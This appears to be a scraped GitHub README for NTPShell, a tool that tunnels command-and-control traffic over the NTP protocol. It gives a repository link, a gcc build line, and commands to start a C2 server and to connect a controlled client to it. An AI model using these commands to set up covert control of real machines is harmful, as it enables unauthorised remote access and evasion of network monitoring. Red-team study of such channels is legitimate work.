Skip to content

Latest commit

 

History

History
executable file
·
18 lines (12 loc) · 247 Bytes

NTPShell.md

File metadata and controls

executable file
·
18 lines (12 loc) · 247 Bytes

NTPShell

获取地址https://github.com/aplyc1a/NTPShell

通过NTP协议来负载C2数据。

编译

gcc ntp.c -lpthread -o ntp

使用

c2服务端:./ntp -S
c2被控端:./ntp -C -s {server_addr}